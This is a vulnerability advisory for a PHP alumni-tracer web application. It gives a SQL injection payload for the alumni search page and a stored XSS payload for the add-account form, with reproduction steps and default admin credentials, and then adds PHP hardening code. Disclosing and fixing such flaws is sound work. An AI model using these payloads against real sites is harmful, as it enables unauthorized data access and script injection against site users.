Online Graduate Tracer System for College of ICT Alumni - Vulnerability SQLi + XSS

2023.03.12
Credit: Eren Arslan
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Title: Online Graduate Tracer System for College of ICT Alumni - Vulnerability SQLi + XSS
# Author: @Eawhitehat - Eren Arslan
# Demo available: https://www.sourcecodester.com/php/15904/online-graduate-tracer-system-college-ict-alumni.html
# CVE: N/A
# XSS
# Screenshot: https://prnt.sc/kYTkGywBEgll & https://prnt.sc/z1XXVFuf58zg

Used Payload:
SQLi: )%20or%20('x'='x
XSS: <image/src/onerror=prompt(8)>

Demo Account:
Username: admin
Password: admin

Method:
Connect to panel: http://localhost/admin

#SQLi
1. After login, go to ../admin/admin_cs.php (BSCS Alumni page)
2. Enter the payload in the search form to trigger the database error -> )%20or%20('x'='x

#XSS
1. After login, go to ../admin/add_acc.php (Manage account)
2. Click "Add New" and paste the payload in Username/Name -> <image/src/onerror=prompt(8)>
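Both findings come from the same two omissions: the search term is concatenated into the SQL string (so an unbalanced parenthesis produces a raw database error), and stored account names are echoed back into HTML unencoded. The following is an added example of how the affected handlers can be hardened; it is not code from the Online Graduate Tracer System, and the table `alumni`, its columns, the DSN, the `search` parameter name and the helper function names are assumptions made for illustration.

```php
<?php
// Added example, not the project's code. Assumes a MySQL database reachable
// via PDO and a hypothetical table `alumni` (id, fullname, course).
declare(strict_types=1);

function db(): PDO
{
    // Hypothetical DSN/credentials. Emulated prepares are disabled so the
    // driver sends a real parameterised statement to the server.
    return new PDO(
        'mysql:host=localhost;dbname=tracer;charset=utf8mb4',
        'app_user',
        'app_password',
        [
            PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_EMULATE_PREPARES   => false,
            PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
        ]
    );
}

// Fix for the SQLi: the search term is bound as data, so characters such as
// ")" or "'" inside it can never alter the structure of the query.
function searchAlumni(PDO $pdo, string $term, string $course): array
{
    $stmt = $pdo->prepare(
        'SELECT id, fullname, course FROM alumni
          WHERE course = :course AND fullname LIKE :term'
    );
    $stmt->execute([
        ':course' => $course,
        ':term'   => '%' . $term . '%',
    ]);
    return $stmt->fetchAll();
}

// Fix for the stored XSS: every value written into the page is HTML-encoded,
// so a name containing "<image ... onerror=...>" is shown as text, not parsed.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Defence in depth for the "Add New" account form: only accept names that
// are plain text before they reach the database at all.
function isValidUsername(string $name): bool
{
    return (bool) preg_match('/^[A-Za-z0-9 ._-]{1,64}$/', $name);
}

// Defence in depth for the page as a whole: disallow inline scripts so an
// event handler attribute that did slip through would not execute.
header("Content-Security-Policy: default-src 'self'");

$term = (string) ($_GET['search'] ?? '');

try {
    $rows = searchAlumni(db(), $term, 'BSCS');
} catch (PDOException $ex) {
    // Log the detail server-side; never echo the raw driver error to the
    // client, since that message is what reveals an injectable query.
    error_log('alumni search failed: ' . $ex->getMessage());
    http_response_code(500);
    echo '<p>Search is temporarily unavailable.</p>';
    exit;
}

echo '<table>';
foreach ($rows as $row) {
    echo '<tr><td>' . e((string) $row['id']) . '</td>'
       . '<td>' . e($row['fullname']) . '</td>'
       . '<td>' . e($row['course']) . '</td></tr>';
}
echo '</table>';
```

The same `e()` helper should wrap the username wherever the "Manage account" page lists accounts, because the injection point is the stored value, not the form that accepted it; encoding only on input would leave every other rendering path exposed.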

